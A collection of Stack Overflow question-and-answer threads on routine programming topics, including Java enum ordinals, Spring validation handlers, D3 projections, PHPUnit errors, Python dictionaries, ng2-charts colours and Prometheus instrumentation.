public Integer getHierarchy() {
return hierarchy;
}
}
A: If you only want to create relationships between enum values, you can actually use the trick of using other enum values:
public enum Person {
GRANDPARENT(null),
PARENT(GRANDPARENT),
CHILD(PARENT);
private final Person parent;
private Person(Person parent) {
this.parent = parent;
}
public final Person getParent() {
return parent;
}
}
Note that you can only use enum values that were declared lexically before the one you're trying to declare, so this only works if your relationships form an acyclic directed graph (and the order you declare them is a valid topological sort).
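An illustrative use of this chain (hedged, not from the answer) replaces numeric comparison with a walk up the parents:
// true when candidate appears somewhere above p in the chain
static boolean isAncestor(Person candidate, Person p) {
    for (Person cur = p.getParent(); cur != null; cur = cur.getParent()) {
        if (cur == candidate) return true;
    }
    return false;
}
// isAncestor(Person.PARENT, Person.CHILD) -> true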
A: TLDR: No, you should not!
If you refer to the javadoc for ordinal method in Enum.java:
Most programmers will have no use for this method. It is
designed for use by sophisticated enum-based data structures, such
as java.util.EnumSet and java.util.EnumMap.
Firstly - read the manual (javadoc in this case).
Secondly - don't write brittle code. The enum values may change in future and your second code example is much more clear and maintainable.
You definitely don't want to create problems for the future if a new enum value is (say) inserted between PARENT and GRANDPARENT.
A: Using ordinal() is unrecommended as changes in the enum's declaration may impact the ordinal values.
UPDATE:
It is worth noting that the enum fields are constants and can have duplicated values, i.e.
enum Family {
OFFSPRING(0),
PARENT(1),
GRANDPARENT(2),
SIBLING(3),
COUSIN(4),
UNCLE(4),
AUNT(4);
private final int hierarchy;
private Family(int hierarchy) {
this.hierarchy = hierarchy;
}
public int getHierarchy() {
return hierarchy;
}
}
Depending on what you're planning to do with hierarchy this could either be damaging or beneficial.
Furthermore, you could use the enum constants to build your very own EnumFlags instead of using EnumSet, for example
A: I would use your second option (using a explicit integer) so the numeric values are assigned by you and not by Java.
A: Let's consider following example:
We need to order several filters in our Spring Application. This is doable by registering filters via FilterRegistrationBeans:
@Bean
public FilterRegistrationBean compressingFilterRegistration() {
FilterRegistrationBean registration = new FilterRegistrationBean();
registration.setFilter(compressingFilter());
registration.setName("CompressingFilter");
...
registration.setOrder(1);
return registration;
}
Let's assume we have several filters and we need to specify their order (e.g. we want the filter which adds the JSID to the MDC context for all loggers to run first).
And here I see the perfect usecase for ordinal(). Let's create the enum:
enum FilterRegistrationOrder {
MDC_FILTER,
COMPRESSING_FILTER,
CACHE_CONTROL_FILTER,
SPRING_SECURITY_FILTER,
...
}
Now in registration bean we can use:
registration.setOrder(MDC_FILTER.ordinal());
And it works perfectly in our case. If we didn't have an enum for this, we would have had to renumber all the filter orders by adding 1 to them (or to the constants which store them). With the enum we only need to add one line in the proper place and use ordinal. We don't have to change the code in many places, and we have a clear order structure for all our filters in one place.
In a case like this I think the ordinal() method is the best option to achieve the filter ordering in a clean and maintainable way.
A: You must use your judgement to evaluate which kind of errors would be more severe in your particular case. There is no one-size-fits-all answer to this question. Each solution leverages one advantage of the compiler but sacrifices the other.
If your worst nightmare is enums sneakily changing value: use ENUM(int)
If your worst nightmare is enum values becoming duplicated or losing contiguousness: use ordinal.
A: As suggested by Joshua Bloch in Effective Java, it's not a good idea to derive a value associated with an enum from its ordinal, because changes to the ordering of the enum values might break the logic you encoded.
The second approach you mention follows exactly what the author proposes, which is storing the value in a separate field.
I would say that the alternative you suggested is definitely better because it is more extendable and maintainable, as you are decoupling the ordering of the enum values and the notion of hierarchy.
A: The first way is not straight understandable as you have to read the code where the enums are used to understand that the order of the enum matters.
It is very error prone.
public enum Persons {
CHILD,
PARENT,
GRANDPARENT;
}
The second way is better as it is self explanatory :
CHILD(0),
PARENT(1),
GRANDPARENT(2);
private Persons(final Integer hierarchy) {
this.hierarchy = hierarchy;
}
Of course, the order of the enum values should stay consistent with the hierarchical order provided by the enum constructor arguments.
This introduces a kind of redundancy, as both the position of the enum values and the arguments of the enum constructor convey the hierarchy.
But why would it be a problem ?
Enums are designed to represent constant and not frequently changing values.
The OP enum usage illustrates well a good enum usage :
CHILD, PARENT, GRANDPARENT
Enums are not designed to represent values that change frequently.
In that case, using enums is probably not the best choice, as it may frequently break the client code that uses them; besides, it forces you to recompile, repackage and redeploy the application each time an enum value is modified.
A: First, you probably don't even need a numeric order value -- that's
what Comparable
is for, and Enum<E> implements Comparable<E>.
If you do need a numeric order value for some reason, yes, you should
use ordinal(). That's what it's for.
Standard practice for Java Enums is to sort by declaration order,
which is why Enum<E> implements Comparable<E> and why
Enum.compareTo() is final.
If you add your own non-standard comparison code that doesn't use
Comparable and doesn't depend on the declaration order, you're just
going to confuse anyone else who tries to use your code, including
your own future self. No one is going to expect that code to exist;
they're going to expect Enum to be Enum.
If the custom order doesn't match the declaration order, anyone
looking at the declaration is going to be confused. If it does
(happen to, at this moment) match the declaration order, anyone
looking at it is going to come to expect that, and they're going to
get a nasty shock when at some future date it doesn't. (If you write
code (or tests) to ensure that the custom order matches the
declaration order, you're just reinforcing how unnecessary it is.)
If you add your own order value, you're creating maintenance headaches
for yourself:
*
*you need to make sure your hierarchy values are unique
*if you add a value in the middle, you need to renumber all
subsequent values
If you're worried someone could change the order accidentally in the
future, write a unit test that checks the order.
In sum, in the immortal words of Item 47:
know and use the libraries.
P.S. Also, don't use Integer when you mean int.
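For instance, a minimal sketch of such a unit test (assuming JUnit 4 on the classpath):
import static org.junit.Assert.assertArrayEquals;
import org.junit.Test;

public class PersonsOrderTest {
    @Test
    public void declarationOrderIsStable() {
        // Fails loudly if someone reorders or inserts a constant.
        assertArrayEquals(new Persons[] { Persons.CHILD, Persons.PARENT, Persons.GRANDPARENT },
                          Persons.values());
    }
}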
A: According to java doc
Returns the ordinal of this enumeration constant (its position in its
enum declaration, where the initial constant is assigned an ordinal of
zero). Most programmers will have no use for this method. It is
designed for use by sophisticated enum-based data structures, such as
EnumSet and EnumMap.
You can control the ordinal by changing the order of the enum, but you cannot set it explicitly. One workaround is to provide an extra method in your enum for the number you want.
enum Mobile {
Samsung(400), Nokia(250),Motorola(325);
private final int val;
private Mobile (int v) { val = v; }
public int getVal() { return val; }
}
In this situation Samsung.ordinal() = 0, but Samsung.getVal() = 400.
A: This is not a direct answer to your question, but rather a better approach for your use case. It makes sure that the next developer will explicitly know that the values assigned to the properties should not be changed.
Create a class with static properites which will simulate your enum:
public class Persons {
final public static int CHILD = 0;
final public static int PARENT = 1;
final public static int GRANDPARENT = 2;
}
Then use it just like an enum:
Persons.CHILD
It will work for most simple use cases. Otherwise you will miss out on options like valueOf(), EnumSet, EnumMap or values().
| stackoverflow | {
"language": "en",
"length": 1458,
"provenance": "stackexchange_0000F.jsonl.gz:900743",
"question_score": "48",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654291"
} |
fcbc5912e59af39ee20fcfc228fe321f5d3984ef | Stackoverflow Stackexchange
Q: spring mvc validation exceptions are not handled by ControllerAdvice I have a controller in a Spring Boot application which validates the input using Hibernate Validator. Whenever I call the REST endpoint, it validates correctly, but my controller advice doesn't catch the validation failure so that I can customise the message. We only get a 404 code with an empty payload.
@RestController
public class Controller {
@RequestMapping(method = RequestMethod.POST, path = RestPaths.LOAD_DATA)
public void loadCostCenterData(@RequestBody @Valid ClientDto dto) {
}
}
@RestControllerAdvice
public class WickesGlobalExceptionMapper extends ResponseEntityExceptionHandler {
@ExceptionHandler(Exception.class)
public ResponseEntity handleOtherUnexpectedException(Exception ex, WebRequest request) {
}
}
A: Here is a working ControllerAdvice that uses ModelAndView instead of ResponseEntity:
@ControllerAdvice
public class WickesGlobalExceptionMapper {
@ExceptionHandler(IllegalArgumentException.class)
@ResponseStatus(HttpStatus.BAD_REQUEST)
public ModelAndView handleInvalidArgument(IllegalArgumentException ex) {
ModelAndView modelAndView = new ModelAndView();
modelAndView.setView(new MappingJackson2JsonView());
modelAndView.addObject("errorMessage", format("{0}", ex.getMessage()));
return modelAndView;
}
}
| Q: spring mvc validation exceptions are not handled by ControllerAdvice I have a controller in a Spring Boot application which validates the input using Hibernate Validator. Whenever I call the REST endpoint, it validates correctly, but my controller advice doesn't catch the validation failure so that I can customise the message. We only get a 404 code with an empty payload.
@RestController
public class Controller {
@RequestMapping(method = RequestMethod.POST, path = RestPaths.LOAD_DATA)
public void loadCostCenterData(@RequestBody @Valid ClientDto dto) {
}
}
@RestControllerAdvice
public class WickesGlobalExceptionMapper extends ResponseEntityExceptionHandler {
@ExceptionHandler(Exception.class)
public ResponseEntity handleOtherUnexpectedException(Exception ex, WebRequest request) {
}
}
A: Here is a working ControllerAdvice that uses ModelAndView instead of ResponseEntity:
@ControllerAdvice
public class WickesGlobalExceptionMapper {
@ExceptionHandler(IllegalArgumentException.class)
@ResponseStatus(HttpStatus.BAD_REQUEST)
public ModelAndView handleInvalidArgument(IllegalArgumentException ex) {
ModelAndView modelAndView = new ModelAndView();
modelAndView.setView(new MappingJackson2JsonView());
modelAndView.addObject("errorMessage", format("{0}", ex.getMessage()));
return modelAndView;
}
}
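A side note not stated above: @Valid failures on a @RequestBody raise MethodArgumentNotValidException, which ResponseEntityExceptionHandler already claims, so a generic @ExceptionHandler(Exception.class) in a subclass never sees it. A hedged sketch of overriding the dedicated hook instead:
// Inside WickesGlobalExceptionMapper (sketch; imports assumed: java.util.*, org.springframework.http.*,
// org.springframework.web.bind.MethodArgumentNotValidException, org.springframework.web.context.request.WebRequest)
@Override
protected ResponseEntity<Object> handleMethodArgumentNotValid(MethodArgumentNotValidException ex,
        HttpHeaders headers, HttpStatus status, WebRequest request) {
    Map<String, String> errors = new HashMap<>();
    ex.getBindingResult().getFieldErrors()
            .forEach(f -> errors.put(f.getField(), f.getDefaultMessage()));
    return new ResponseEntity<>(errors, HttpStatus.BAD_REQUEST);
}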
| stackoverflow | {
"language": "en",
"length": 129,
"provenance": "stackexchange_0000F.jsonl.gz:900775",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654390"
} |
5d08655e468c95ab2b5b25432310477826bf8367 | Stackoverflow Stackexchange
Q: D3.js Orthographic projection and artefacts? I have an issue with the representation of a geoJSON file (milky way).
It seems that the contours are, in some cases (depending on the rotation), misinterpreted or actually closed the wrong way. See the attached screenshots and the codepen https://codepen.io/anon/pen/wdYmqL where you can manually rotate the projection.
We can also see the artefact in d3-celestial (https://github.com/ofrohn/d3-celestial) here:
http://armchairastronautics.blogspot.de/p/skymap.html
Does anybody know what happens? Any solution? Thanks ;)
Code:
var path = d3.geoPath()
.projection(d3.geoOrthographic());
g.selectAll("path")
.data(milkyWayGeoJson.features)
.enter().append('path')
.attr("class", "mw")
.attr("d", path);
| Q: D3.js Orthographic projection and artefacts? I have an issue with the representation of a geoJSON file (milky way).
It seems that the contours are, in some cases (depending on the rotation), misinterpreted or actually closed the wrong way. See the attached screenshots and the codepen https://codepen.io/anon/pen/wdYmqL where you can manually rotate the projection.
We can also see the artefact in d3-celestial (https://github.com/ofrohn/d3-celestial) here:
http://armchairastronautics.blogspot.de/p/skymap.html
Does anybody know what happens? Any solution? Thanks ;)
Code:
var path = d3.geoPath()
.projection(d3.geoOrthographic());
g.selectAll("path")
.data(milkyWayGeoJson.features)
.enter().append('path')
.attr("class", "mw")
.attr("d", path);
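A hedged note, since no fix is recorded above: d3-geo treats every polygon ring as a region on the sphere, so a ring wound in the opposite direction is interpreted as covering the rest of the globe, which produces exactly this kind of fill artifact at certain rotations. If the source data follows the GeoJSON right-hand rule, reversing each ring before rendering is a quick test (this sketch assumes MultiPolygon geometries):
milkyWayGeoJson.features.forEach(function(feature) {
  feature.geometry.coordinates.forEach(function(polygon) {
    polygon.forEach(function(ring) { ring.reverse(); });
  });
});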
| stackoverflow | {
"language": "en",
"length": 87,
"provenance": "stackexchange_0000F.jsonl.gz:900785",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654439"
} |
d1b4f99ab4a0c5bf844fb14d5131bb6a8253b74f | Stackoverflow Stackexchange
Q: Blocked Access to geolocation was blocked over secure connection with mixed content I'm using a plugin in WordPress that uses the Google Maps API but keep getting this error:
[blocked] Access to geolocation was blocked over secure connection with mixed content to...
My site is on SSL, and I've checked that the google API script is not trying to be pulled in via http (it is https as it should be).
I'm not sure what could be causing this issue. Maybe there is something I need to do in my htaccess file? Please help! Thanks!
A: Check the list below:
1. Your site has http links instead of https links, which is why you are facing the mixed content warning (you can find this warning in your browser console). Find those links on your website and change them to https links.
2. Add a Google API key in the configuration:
https://developers.google.com/maps/documentation/javascript/get-api-key
| Q: Blocked Access to geolocation was blocked over secure connection with mixed content I'm using a plugin in WordPress that uses the Google Maps API but keep getting this error:
[blocked] Access to geolocation was blocked over secure connection with mixed content to...
My site is on SSL, and I've checked that the google API script is not trying to be pulled in via http (it is https as it should be).
I'm not sure what could be causing this issue. Maybe there is something I need to do in my htaccess file? Please help! Thanks!
A: Check the list below:
1. Your site has http links instead of https links, which is why you are facing the mixed content warning (you can find this warning in your browser console). Find those links on your website and change them to https links.
2. Add a Google API key in the configuration:
https://developers.google.com/maps/documentation/javascript/get-api-key
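A side note (not part of the answer): a page served over https can also ask the browser to upgrade its own stray http subresource requests with a Content-Security-Policy directive:
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">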
| stackoverflow | {
"language": "en",
"length": 147,
"provenance": "stackexchange_0000F.jsonl.gz:900798",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654475"
} |
c1dc5a6fba72ef8712bdbefea1102cec1b7565b2 | Stackoverflow Stackexchange
Q: How to reset the state of a StackNavigator nested in a DrawerNavigatior? I am building an app whose navigation is based on a DrawerNavigator from the react-navigation library.
This navigator has 3 tabs:
*
*2 regular tabs
*1 StackNavigator named "Search"
The StackNavigator consists of one screen that lets the user search for an item, and a second screen where the user sees the search results.
I do not want the search results page to be a tab of a DrawerNavigator, this is why I implemented this structure.
The problem is: if the user has already performed a search, when he clicks on the "Search" tab, he does not come back to the search screen but to the search results screen. I would prefer that the user comes back to the search screen.
How can I achieve that?
A: You can achieve this using navigation dispatch with NavigationActions:
import { NavigationActions } from 'react-navigation';
const resetAction = NavigationActions.reset({
index: 0,
actions: [
NavigationActions.navigate({
routeName: 'DrawerScreen',
params: {},
action: NavigationActions.navigate({ routeName: 'SearchScreen' }),
}),
],
})
navigation.dispatch(resetAction)
| Q: How to reset the state of a StackNavigator nested in a DrawerNavigatior? I am building an app whose navigation is based on a DrawerNavigator from the react-navigation library.
This navigator has 3 tabs:
*
*2 regular tabs
*1 StackNavigator named "Search"
The StackNavigator consists of one screen that lets the user search for an item, and a second screen where the user sees the search results.
I do not want the search results page to be a tab of a DrawerNavigator, this is why I implemented this structure.
The problem is: if the user has already performed a search, when he clicks on the "Search" tab, he does not come back to the search screen but to the search results screen. I would prefer that the user comes back to the search screen.
How can I achieve that?
A: You can achieve this using navigation dispatch with NavigationActions:
import { NavigationActions } from 'react-navigation';
const resetAction = NavigationActions.reset({
index: 0,
actions: [
NavigationActions.navigate({
routeName: 'DrawerScreen',
params: {},
action: NavigationActions.navigate({ routeName: 'SearchScreen' }),
}),
],
})
navigation.dispatch(resetAction)
A: import { NavigationActions } from 'react-navigation';
const resetAction = NavigationActions.reset({
index: 0,
actions: [
NavigationActions.navigate({ routeName: 'SearchScreen'})
]
})
Then, in your button or any element with an event handler, add this:
this.props.navigation.dispatch(resetAction)
<Button
onPress= {
() => this.props.navigation.dispatch(resetAction)
}
title='Back to Search'
/>
| stackoverflow | {
"language": "en",
"length": 220,
"provenance": "stackexchange_0000F.jsonl.gz:900801",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654483"
} |
5510ca4b5a461f53f61e219fbace05c6d2331770 | Stackoverflow Stackexchange
Q: class PHPUnit\Framework\ExpectationFailedException not found when I try to run a failed test with this command :
./vendor/bin/phpunit
I get this Fatal Error :
PHPUnit 5.7.20 by Sebastian Bergmann and contributors.
PHP Fatal error: Class 'PHPUnit\Framework\ExpectationFailedException'
not found in /var/www/zend/vendor/zendframework/zend-
test/src/PHPUnit/Controller/AbstractControllerTestCase.php on line 444
A: Your version of PHPUnit is probably too old for your version of Zend. The class was renamed in PHPUnit 6.x from PHPUnit_Framework_ExpectationFailedException to the namespaced PHPUnit\Framework\ExpectationFailedException.
Please check your PHPUnit version with phpunit --version; it should be 6.x. Update it to the latest version to avoid this error.
| Q: class PHPUnit\Framework\ExpectationFailedException not found when I try to run a failed test with this command :
./vendor/bin/phpunit
I get this Fatal Error :
PHPUnit 5.7.20 by Sebastian Bergmann and contributors.
PHP Fatal error: Class 'PHPUnit\Framework\ExpectationFailedException'
not found in /var/www/zend/vendor/zendframework/zend-
test/src/PHPUnit/Controller/AbstractControllerTestCase.php on line 444
A: Your version of PHPUnit is probably too old for your version of Zend. The class was renamed in PHPUnit 6.x from PHPUnit_Framework_ExpectationFailedException to the namespaced PHPUnit\Framework\ExpectationFailedException.
Please check your PHPUnit version with phpunit --version; it should be 6.x. Update it to the latest version to avoid this error.
A: This is a configuration flaw in zend-test. It consumes classes from PHPUnit 6, but per its Composer requirements, PHPUnit versions before that are OK to require:
"phpunit/phpunit": "^4.0 || ^5.0 || ^6.0",
Most likely, because your system's PHP version does not satisfy the requirements of PHPUnit 6, the next lower version was installed.
As the code in the base test case (https://github.com/zendframework/zend-test/blob/master/src/PHPUnit/Controller/AbstractControllerTestCase.php#L444) makes use of PHPUnit 6 classes, I strongly assume that once the configuration flaw is reported to the zend-test project, you won't even be able to install it on your system any longer.
Therefore upgrade to a recent PHP version and then run
composer update
If you're stuck with the PHP version, downgrade zend-test to a version that supports an older PHPUnit version. I don't know that project well, so this is just a suggestion; I don't know whether such a version exists, nor can I recommend one.
I filed a report, perhaps using that one class was an oversight or there is a less hard way to resolve the dependency: https://github.com/zendframework/zend-test/issues/50
A: This is "fixed" by a script in Zend\Test called phpunit-class-aliases.php but it's not configured properly IMHO since it's in the autoload-dev section (meaning it doesn't propagate out to other projects.)
So, in your project composer.json, do something like this:
"autoload-dev": {
"files": [
"vendor/zendframework/zend-test/autoload/phpunit-class-aliases.php"
]
},
Then composer install
N.B. Zend\Test has a pull request that fixes this very thing, but they're saying it's PHPUnit's fault (Shame on you PHPUnit 4 for... idunno... having the wrong class name according to Zend\Test) So, I've done it instead: composer require illchuk/phpunit-class-aliases
| stackoverflow | {
"language": "en",
"length": 359,
"provenance": "stackexchange_0000F.jsonl.gz:900823",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654541"
} |
eff285adb05723ae5107dfd28af56cdcd585f364 | Stackoverflow Stackexchange
Q: Extract sub dictionary from keys that appear in a given list Consider that I have a dictionary that looks like this:
{1=>a, 2=>b, 3=>c, 4=>d}
and a list that looks like this:
[1, 2, 3]
is there a method that'd return me a subdictionary only containing
{1=>a, 2=>b, 3=>c}
A: a regular dict-comprehension would do that:
d = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
keys = [1, 2, 3]
dct = {key: d[key] for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
there are 2 ways to handle keys in keys that are not in the original dictionary:
keys = [1, 2, 3, 7]
# default value None
dct = {key: d[key] if key in d else None for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c', 7: None}
# ignore the key if it is not in the original dict
dct = {key: d[key] for key in set(keys).intersection(d.keys())}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
| Q: Extract sub dictionary from keys that appear in a given list Consider that I have a dictionary that looks like this:
{1=>a, 2=>b, 3=>c, 4=>d}
and a list that looks like this:
[1, 2, 3]
is there a method that'd return me a subdictionary only containing
{1=>a, 2=>b, 3=>c}
A: a regular dict-comprehension would do that:
d = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
keys = [1, 2, 3]
dct = {key: d[key] for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
there are 2 ways to handle keys in keys that are not in the original dictionary:
keys = [1, 2, 3, 7]
# default value None
dct = {key: d[key] if key in d else None for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c', 7: None}
# ignore the key if it is not in the original dict
dct = {key: d[key] for key in set(keys).intersection(d.keys())}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
| stackoverflow | {
"language": "en",
"length": 166,
"provenance": "stackexchange_0000F.jsonl.gz:900826",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654547"
} |
8f5adb9c1da43a2d67b6930b1f745e3dbef71b08 | Stackoverflow Stackexchange
Q: Python return with multiple dictionaries from a function my problem is that I have two functions, and one of them returns two dictionaries in the following way:
def fnct1():
return dict1, dict2
so it returns into my other function, whose return value is the two dictionaries from the previous function plus a new dictionary, something like this:
def fnct2():
return dict3, fnct1()
the problem with this is that it has the following result:
({dict3}, ({dict1}, {dict2}))
but I want it to look the following way:
({dict3},{dict1},{dict2})
A: You could unpack the values from fnct1() before returning them:
def fnct2():
dict1, dict2 = fnct1()
return dict3, dict1, dict2
| Q: Python return with multiple dictionaries from a function my problem is that I have two functions, and one of them returns two dictionaries in the following way:
def fnct1():
return dict1, dict2
so it returns into my other function, whose return value is the two dictionaries from the previous function plus a new dictionary, something like this:
def fnct2():
return dict3, fnct1()
the problem with this is that it has the following result:
({dict3}, ({dict1}, {dict2}))
but I want it to look the following way:
({dict3},{dict1},{dict2})
A: You could unpack the values from fnct1() before returning them:
def fnct2():
dict1, dict2 = fnct1()
return dict3, dict1, dict2
A: Since your function returns a tuple, you need to either return the individual tuple items, or unpack them:
def fnct1():
dict1 = { "name": "d1" }
dict2 = { "name": "d2" }
return dict1, dict2
def fnct2():
dict3 = { "name": "d3" }
res = fnct1()
return dict3, res[0], res[1] # return the individual tuple elements
# alternative implementation of fnct2:
def fnct2():
dict3 = { "name": "d3" }
d1, d2 = fnct1() # unpack your tuple
return dict3, d1, d2
print(fnct2())
# Output: ({'name': 'd3'}, {'name': 'd1'}, {'name': 'd2'})
A: If you assign the returned value of the 1st function to a, then in the 2nd just return a[0], a[1], otherDict.
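On Python 3.5+ the flattening can also happen directly in the return statement via iterable unpacking (a sketch using the names above):
def fnct2():
    dict3 = {"name": "d3"}
    return (dict3, *fnct1())  # ({...d3}, {...d1}, {...d2})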
| stackoverflow | {
"language": "en",
"length": 222,
"provenance": "stackexchange_0000F.jsonl.gz:900828",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654549"
} |
405a8f654b4e1bdba8e13c2750ca886e9dfa88bb | Stackoverflow Stackexchange
Q: Chart.js ng2-charts colors in pie chart not showing I am using ng-2 charts and while I can display the pie chart correctly, I am not able to change the colors of the different pie slices.
It seems like there is a bug where all the slices of the pie get the first color declared in the object (in this case red).
My component.ts looks like :
public pieChartColors:Array<any> = [
{
backgroundColor: 'red',
borderColor: 'rgba(135,206,250,1)',
},
{
backgroundColor: 'yellow',
borderColor: 'rgba(106,90,205,1)',
},
{
backgroundColor: 'rgba(148,159,177,0.2)',
borderColor: 'rgba(148,159,177,1)',
}
];
// Pie
public pieChartLabels:string[] = ['First Set', 'Sales', 'Mail'];
public pieChartData:number[] = [300, 500, 100];
public pieChartType:string = 'pie';
My view:
<canvas
[chartType]="pieChartType"
[colors]="pieChartColors"
[data]="pieChartData"
[labels]="pieChartLabels"
baseChart
></canvas>
A: Solved this problem by adding *ngIf="pieChartLabels && pieChartData" condition in the HTML template:
<div class="card">
<div class="card-header">
Pie Chart
</div>
<div class="card-body">
<div class="chart-wrapper" *ngIf="pieChartLabels && pieChartData">
<canvas baseChart class="chart"
[data]="pieChartData"
[labels]="pieChartLabels"
[chartType]="pieChartType"
(chartHover)="chartHovered($event)"
(chartClick)="chartClicked($event)">
</canvas>
</div>
</div>
</div>
| Q: Chart.js ng2-charts colors in pie chart not showing I am using ng-2 charts and while I can display the pie chart correctly, I am not able to change the colors of the different pie slices.
It seems like there is a bug where all the slices of the pie get the first color declared in the object (in this case red).
My component.ts looks like :
public pieChartColors:Array<any> = [
{
backgroundColor: 'red',
borderColor: 'rgba(135,206,250,1)',
},
{
backgroundColor: 'yellow',
borderColor: 'rgba(106,90,205,1)',
},
{
backgroundColor: 'rgba(148,159,177,0.2)',
borderColor: 'rgba(148,159,177,1)',
}
];
// Pie
public pieChartLabels:string[] = ['First Set', 'Sales', 'Mail'];
public pieChartData:number[] = [300, 500, 100];
public pieChartType:string = 'pie';
My view:
<canvas
[chartType]="pieChartType"
[colors]="pieChartColors"
[data]="pieChartData"
[labels]="pieChartLabels"
baseChart
></canvas>
A: Solved this problem by adding *ngIf="pieChartLabels && pieChartData" condition in the HTML template:
<div class="card">
<div class="card-header">
Pie Chart
</div>
<div class="card-body">
<div class="chart-wrapper" *ngIf="pieChartLabels && pieChartData">
<canvas baseChart class="chart"
[data]="pieChartData"
[labels]="pieChartLabels"
[chartType]="pieChartType"
(chartHover)="chartHovered($event)"
(chartClick)="chartClicked($event)">
</canvas>
</div>
</div>
</div>
A: Try something like the following ...
public pieChartColors: Array < any > = [{
backgroundColor: ['red', 'yellow', 'rgba(148,159,177,0.2)'],
borderColor: ['rgba(135,206,250,1)', 'rgba(106,90,205,1)', 'rgba(148,159,177,1)']
}];
...
not a 'ng2-charts' pro, but afaik this should work.
A: I agree with the above answer; I would like to provide details if someone needs them. My example is a PIE chart, but it works for other chart types too.
Step-1:
Add the following in your component.ts file
public pieChartOptions: ChartOptions = {
responsive: true,
};
public pieChartLabels: Label[] = [['Not', 'Completed'], ['Completed', 'Tasks'], 'Pending Tasks'];
public pieChartData: SingleDataSet = [300, 500, 100];
public pieChartType: ChartType = 'pie';
public pieChartLegend = true;
public pieChartPlugins = [];
public pieChartColors: Array < any > = [{
backgroundColor: ['#fc5858', '#19d863', '#fdf57d'],
borderColor: ['rgba(252, 235, 89, 0.2)', 'rgba(77, 152, 202, 0.2)', 'rgba(241, 107, 119, 0.2)']
}];
chartClicked(e){
console.log(e);
console.log('=========Chart clicked============');
}
chartHovered(e){
console.log(e);
console.log('=========Chart hovered============');
}
Step-2 :
Your component.html should look something like below:
<canvas baseChart
[data]="pieChartData"
[labels]="pieChartLabels"
[chartType]="pieChartType"
[options]="pieChartOptions"
[plugins]="pieChartPlugins"
[legend]="pieChartLegend"
[colors]="pieChartColors"
(chartHover)="chartHovered($event)"
(chartClick)="chartClicked($event)"
>
</canvas>
A: HTML:
<canvas baseChart width="200" height="200"
[data]="chartData"
[options]="chartOptions"
[type]="chartType">
</canvas>
TS:
import { Component, OnInit, ViewChild } from '@angular/core';
import { ChartConfiguration, ChartData, ChartType } from 'chart.js';
import { BaseChartDirective } from 'ng2-charts';
export class MyChartComponent implements OnInit {
@ViewChild(BaseChartDirective) chart: BaseChartDirective | undefined;
constructor() { }
ngOnInit(): void {}
public chartOptions: ChartConfiguration['options'] = {
responsive: true,
plugins: {
legend: {
display: true,
position: 'top',
},
},
};
public chartData: ChartData<'pie', number[], string | string[]> = {
labels: ['Low', 'Middle', 'High'],
datasets: [{
data: [25, 40, 35],
backgroundColor: ['rgba(0, 160, 0, 1)', 'rgba(240, 160, 0, 1)', 'rgba(220, 0, 0, 1)'],
borderColor: ['rgba(250, 250, 250, 1)', 'rgba(250, 250, 250, 1)', 'rgba(250, 250, 250, 1)'],
hoverBackgroundColor: ['rgba(0, 160, 0, 0.8)', 'rgba(240, 160, 0, 0.8)', 'rgba(220, 0, 0, 0.8)'],
hoverBorderColor: ['rgba(0, 160, 0, 1)', 'rgba(240, 160, 0, 1)', 'rgba(220, 0, 0, 1)'],
}],
};
public chartType: ChartType = 'pie';
}
And change these colors to your own ones.
| stackoverflow | {
"language": "en",
"length": 478,
"provenance": "stackexchange_0000F.jsonl.gz:900857",
"question_score": "7",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654665"
} |
a5a87a8c01a2fb8b413d5fedc349e64abf6dd293 | Stackoverflow Stackexchange
Q: What does "instrument" exactly mean in prometheus Recently I am learning an open source systems monitoring and alerting toolkit Prometheus.
I read the online documentation carefully. There is a glossary named "Instrument" (instrumentation or instrumenting) in Prometheus. For me it's not very easy to understand. Perhaps it's because this word has so many different meanings when I searched in my dictionary, and none of them are suitable to help me understand it in Prometheus context (My native language is not English).
Could someone explain its meaning in a simple way? And what is "instrumentation" for and why we need it in Prometheus?
Many thanks for your help.
A: In the context of Prometheus, instrumentation is the use of a library in an application's code base in order to expose and update metrics about it for a Prometheus instance to scrape.
For example, one could use the Prometheus Python client (contains example) in their python based application to expose metrics about it to be scraped.
| Q: What does "instrument" exactly mean in prometheus Recently I am learning an open source systems monitoring and alerting toolkit Prometheus.
I read the online documentation carefully. There is a glossary named "Instrument" (instrumentation or instrumenting) in Prometheus. For me it's not very easy to understand. Perhaps it's because this word has so many different meanings when I searched in my dictionary, and none of them are suitable to help me understand it in Prometheus context (My native language is not English).
Could someone explain its meaning in a simple way? And what is "instrumentation" for and why we need it in Prometheus?
Many thanks for your help.
A: In the context of Prometheus, instrumentation is the use of a library in an application's code base in order to expose and update metrics about it for a Prometheus instance to scrape.
For example, one could use the Prometheus Python client (contains example) in their python based application to expose metrics about it to be scraped.
A: In the Prometheus context, instrumentation is adding code to create and update metrics inside your application. Here's a simple Java guide.
It's needed in Prometheus as it's the best way to get the data that you'll then graph and alert on in Prometheus itself.
A: In the context of Prometheus, instrumentation means adding and exposing your own custom metrics. Say, you want to know how many people are clicking on a button, then you can create a counter metric for this purpose. Tracking the number of API calls being made on an API is another place where you can add and expose your own custom metric.
